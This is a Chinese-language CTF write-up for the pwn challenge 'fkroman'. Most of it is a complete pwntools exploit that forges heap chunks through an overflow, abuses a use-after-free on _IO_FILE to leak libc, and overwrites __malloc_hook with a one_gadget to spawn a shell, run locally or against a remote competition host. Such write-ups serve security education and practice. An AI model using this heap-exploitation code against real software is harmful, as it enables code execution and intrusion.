数字经济 pwn fkroman writeup

参考文章:https://mp.weixin.qq.com/s/Q4A6LwCd2E29uSXjMJs1dg
https://firmianay.gitbooks.io/ctf-all-in-one/doc/4.13_io_file.html
本地环境：ubuntu 16.04
thought:
1、利用堆溢出伪造堆块，并用uaf漏洞打_IO_FILE泄露出libc地址
2、再用uaf漏洞劫持malloc_hook为one_gadget

exp如下，成功率不高。

#!/usr/bin/env python2

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

exe = './fkroman'
lib = './libc-2.23.so'
ip = '121.40.246.48'
port = 9999
elf = ELF(exe)
libc = ELF(lib)


def dbg(script=''):
    attach(io, gdbscript=script)

def choice(idx):
    io.sendlineafter('Your choice: ', str(idx))

def index(idx):
    io.sendlineafter('Index: ', str(idx))

def add(idx, size):
    choice(1)
    index(idx)
    io.sendlineafter('Size: ', str(size))

def dele(idx):
    choice(3)
    index(idx)

def edit(idx, size, content):
    choice(4)
    index(idx)
    io.sendlineafter('Size: ', str(size))
    io.sendafter('Content: ', content)

# ------------------------------------------------
LOCAL = 1
iofile_off = [0x25dd,0xf5eb] #_IO_2_1_stderr_+157
libc_off = 0x7ffff7dd2600-0x7ffff7a0d000
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# ------------------------------------------------


def exp():
    add(0, 0x70-8)
    add(1, 0x70-8)
    add(2, 0x90-8)
    add(3, 0x20-8)
#-------------------leak libc---------------------
    dele(1)
    dele(0)
    dele(2)
    edit(0, 1, p8(0xe0))
    edit(1, 0x70, 'A'*0x68+p64(0x71))
    edit(2, 2, p16(iofile_off[0]))
    #gdb.attach(io)
    add(4, 0x70-8) #0
    #gdb.attach(io)
    add(5, 0x70-8) #2
    #gdb.attach(io)
    add(6, 0x70-8) #target
    #gdb.attach(io)
    edit(6, 0x54, 'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+"\x00")
    #gdb.attach(io)
    io.recv(0x40)
    recv_addr=u64(io.recv(8))
    log.info('libc->'+hex(recv_addr))
    pause()
    libc.address = recv_addr - libc_off
    log.info(hex(libc.address))

#-------------------malloc_hook-------------------
    add(7, 0x70-8) #2
    edit(7, 0x70, 'B'*0x68+p64(0x21))
    dele(7)
    info(hex(libc.sym['__malloc_hook']-0x23))
    pause()
    edit(7, 8, p64(libc.sym['__malloc_hook']-0x23)) #0x7fefcf441aed _IO_wide_data_0+301
    gdb.attach(io)
    add(8, 0x70-8) #2
    add(9, 0x70-8) #target2
    gdb.attach(io)
    info(hex(libc.address+onegadgets[1]))
    pause()
    edit(9, 0x1b, 'C'*0x13+p64(libc.address+onegadgets[1])) #0x7fefcf0c226a
    #gdb.attach(io)
    add(10, 0)
    io.interactive()


# ------------------------------------------------
if __name__ == '__main__':

    for i in range(100):
        try:
            if LOCAL:
                io = elf.process()
                env={"LD_PRELOAD": libc.path}
            else:
                io = remote(ip, port)
            exp()
        except:
            print i